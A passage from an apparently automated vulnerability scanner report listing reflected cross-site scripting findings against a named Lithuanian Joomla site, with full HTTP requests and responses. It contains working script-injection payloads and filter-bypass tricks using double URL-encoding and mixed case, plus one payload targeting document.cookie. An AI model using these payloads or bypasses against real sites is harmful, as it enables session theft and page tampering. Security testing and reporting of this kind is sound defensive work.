The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d560%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f1a33e564 was submitted in the REST URL parameter 2. This input was echoed as 9d560"><script>alert(1)</script>5f1a33e564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /7-joomla-naujienos/9d560%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f1a33e564 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:25 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=14c3863e542d0a99b1068bfc91970394; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/7-joomla-naujienos/9d560"><script>alert(1)</script>5f1a33e564" />
...[SNIP]...

4.1195. http://www.lithuanianjoomla.com/apie-joomla.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /apie-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12405%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2c290fd4de0 was submitted in the REST URL parameter 1. This input was echoed as 12405"><img src=a onerror=alert(1)>2c290fd4de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /12405%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e2c290fd4de0 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/12405"><img src=a onerror=alert(1)>2c290fd4de0" />
...[SNIP]...

4.1196. http://www.lithuanianjoomla.com/component/users/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /component/users/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9861%2522%253e%253ca%253e20822d6648d was submitted in the REST URL parameter 2. This input was echoed as d9861"><a>20822d6648d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /component/usersd9861%2522%253e%253ca%253e20822d6648d/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 404 Component not found
Date: Tue, 25 Jan 2011 00:08:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 4639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir
...[SNIP]...
<form action="/component/usersd9861"><a>20822d6648d/" method="post">
...[SNIP]...

4.1197. http://www.lithuanianjoomla.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a693f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efdcc0a4b4f0 was submitted in the REST URL parameter 1. This input was echoed as a693f"><img src=a onerror=alert(1)>fdcc0a4b4f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a693f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efdcc0a4b4f0 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:34 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/a693f"><img src=a onerror=alert(1)>fdcc0a4b4f0" />
...[SNIP]...

4.1198. http://www.lithuanianjoomla.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 317fb%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e72dcb99ea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 317fb"><img src=a onerror=alert(1)>72dcb99ea8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/317fb%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e72dcb99ea8d HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/index.php/317fb"><img src=a onerror=alert(1)>72dcb99ea8d" />
...[SNIP]...

4.1199. http://www.lithuanianjoomla.com/joomla-naujienos.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a86e%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e34ea042109 was submitted in the REST URL parameter 1. This input was echoed as 2a86e"><ScRiPt>alert(1)</ScRiPt>34ea042109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /2a86e%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e34ea042109 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:43 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 32271


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/2a86e"><ScRiPt>alert(1)</ScRiPt>34ea042109" />
...[SNIP]...

4.1200. http://www.lithuanianjoomla.com/joomla-naujienos.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad78%2522%253e%253ca%253efcdf697ff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ad78"><a>fcdf697ff5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos.html?3ad78%2522%253e%253ca%253efcdf697ff5=1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:30 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<link href="/joomla-naujienos.feed?3ad78"><a>fcdf697ff5=1&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1201. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaabda2089b1 was submitted in the REST URL parameter 1. This input was echoed as fdb66"><script>alert(1)</script>aabda2089b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienosfdb66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaabda2089b1/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienosfdb66"><script>alert(1)</script>aabda2089b1/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html" />
...[SNIP]...

4.1202. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d3e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee139b2265d1 was submitted in the REST URL parameter 2. This input was echoed as c7d3e"><img src=a onerror=alert(1)>e139b2265d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/c7d3e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee139b2265d1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/c7d3e"><img src=a onerror=alert(1)>e139b2265d1" />
...[SNIP]...

4.1203. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b01289864a was submitted in the REST URL parameter 1. This input was echoed as 71d66"><script>alert(1)</script>2b01289864a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos71d66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b01289864a/3-lithuanianjoomlacom-logotipo-konkursas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:45 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17565


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos71d66"><script>alert(1)</script>2b01289864a/3-lithuanianjoomlacom-logotipo-konkursas.html" />
...[SNIP]...

4.1204. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d852%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0357309bacf was submitted in the REST URL parameter 2. This input was echoed as 5d852"><img src=a onerror=alert(1)>0357309bacf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/5d852%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0357309bacf HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/5d852"><img src=a onerror=alert(1)>0357309bacf" />
...[SNIP]...

4.1205. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e948eee3faae was submitted in the REST URL parameter 1. This input was echoed as 61b93"><script>alert(1)</script>948eee3faae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos61b93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e948eee3faae/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:24 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos61b93"><script>alert(1)</script>948eee3faae/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html" />
...[SNIP]...

4.1206. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a70%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ef34b3f0f1a5 was submitted in the REST URL parameter 2. This input was echoed as e5a70"><img src=a onerror=alert(1)>f34b3f0f1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/e5a70%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ef34b3f0f1a5 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/e5a70"><img src=a onerror=alert(1)>f34b3f0f1a5" />
...[SNIP]...

4.1207. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e261bfa3051b was submitted in the REST URL parameter 1. This input was echoed as 77c06"><script>alert(1)</script>261bfa3051b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos77c06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e261bfa3051b/5-pirmasis-joomla-gimtadienis.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
